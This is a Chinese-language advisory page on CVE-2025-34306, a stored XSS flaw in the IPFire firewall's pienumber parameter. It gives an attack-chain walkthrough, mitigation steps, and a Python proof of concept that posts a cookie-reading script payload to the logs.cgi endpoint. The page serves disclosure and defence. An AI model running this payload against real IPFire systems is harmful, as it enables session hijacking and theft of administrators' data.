CVE-2025-34306 IPFire防火墙pienumber参数存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-34306

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IPFire

漏洞概述

CVE-2025-34306是IPFire防火墙产品中的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞影响IPFire 2.29（Core Update 198）之前的所有版本。漏洞根源在于Web界面在处理用户输入的pienumber参数时，未对用户提交的数据进行充分的消毒和HTML编码处理。攻击者作为低权限的已认证用户，可以通过更新默认防火墙IP搜索值功能，将恶意JavaScript代码注入到pienumber参数中。该恶意载荷会被永久存储在系统后台，当其他用户访问受影响的页面时，注入的脚本会在受害者用户的浏览器上下文中执行，从而实现会话劫持、敏感信息窃取或进一步的横向攻击。此漏洞的利用需要用户交互（UI:R），攻击者需要诱导受害者访问特定页面或触发相关功能。CVSS 3.1评分5.4反映出该漏洞在网络条件下可被低权限用户利用，但造成的机密性和完整性影响相对有限。

技术细节

该存储型XSS漏洞存在于IPFire的日志管理Web接口中。当用户更新默认防火墙IP搜索值时，应用程序通过HTTP POST请求将pienumber参数值发送到/cgi-bin/logs.cgi/firewalllogip.dat端点。问题在于服务器端直接存储了该参数值而未进行输入验证和输出编码。随后，当Web界面渲染这些数据展示给用户时，未被转义的恶意脚本标签被嵌入到HTML页面中。攻击者可以利用此漏洞执行任意JavaScript代码，包括但不限于：窃取用户会话Cookie、修改页面内容进行钓鱼攻击、读取用户可访问的页面数据等。由于是存储型XSS，恶意脚本会持久化存在于系统中，所有访问该功能模块的用户都可能成为受害者。攻击利用的关键在于pienumber参数在存储和展示环节缺乏适当的安全处理，攻击者可通过构造如<script>alert(document.cookie)</script>的Payload来实现攻击。

攻击链分析

STEP 1

步骤1

攻击者获取IPFire系统的低权限用户账号（如普通管理员账户）

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS Payload（如<script>恶意代码</script>）

STEP 3

步骤3

攻击者通过HTTP POST请求将恶意pienumber参数值发送到/cgi-bin/logs.cgi/firewalllogip.dat端点

STEP 4

步骤4

服务器端未对输入进行消毒处理，直接将恶意Payload存储到数据库或配置中

STEP 5

步骤5

当其他用户访问防火墙日志设置页面时，存储的恶意脚本被嵌入到HTML响应中

STEP 6

步骤6

受害用户浏览器执行注入的JavaScript代码，导致会话Cookie被窃取或执行攻击者指定的操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-34306 PoC - Stored XSS in IPFire pienumber parameter
# This PoC demonstrates the stored XSS vulnerability in IPFire firewall
# Target: IPFire < 2.29 Core Update 198
# Endpoint: /cgi-bin/logs.cgi/firewalllogip.dat

import requests
import sys
from urllib.parse import urlencode

target_url = "http://target-ipfire:444/cgi-bin/logs.cgi/firewalllogip.dat"

# XSS payload - can be customized for different attack scenarios
xss_payload = '<script>alert(document.cookie)</script>'

# Authentication credentials (low-privilege user)
auth = {
    'username': 'attacker_user',
    'password': 'attacker_password'
}

def exploit_stored_xss():
    """Send malicious pienumber parameter to store XSS payload"""
    
    # Prepare the POST data
    post_data = {
        'pienumber': xss_payload,
        'action': 'update',
        'submit': 'Save'
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        # Send the malicious request
        response = requests.post(
            target_url,
            data=post_data,
            headers=headers,
            auth=(auth['username'], auth['password']),
            timeout=30
        )
        
        print(f"[*] Request sent to {target_url}")
        print(f"[*] Payload: {xss_payload}")
        print(f"[*] Status code: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] XSS payload successfully stored!")
            print("[+] Any user viewing the firewall log IP settings will trigger the JavaScript")
        else:
            print("[-] Request failed")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-34306 - IPFire Stored XSS via pienumber parameter")
    print("=" * 60)
    exploit_stored_xss()

影响范围

IPFire < 2.29 Core Update 198

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制Web管理界面的访问权限，仅允许受信任的IP地址访问；2）启用Web应用防火墙（WAF）规则检测和拦截常见的XSS攻击模式；3）监控日志文件中的异常请求模式；4）提醒用户不要点击来源不明的链接，尤其是包含可疑参数URL的链接；5）考虑暂时禁用非必要的防火墙日志IP搜索功能，直到完成补丁更新。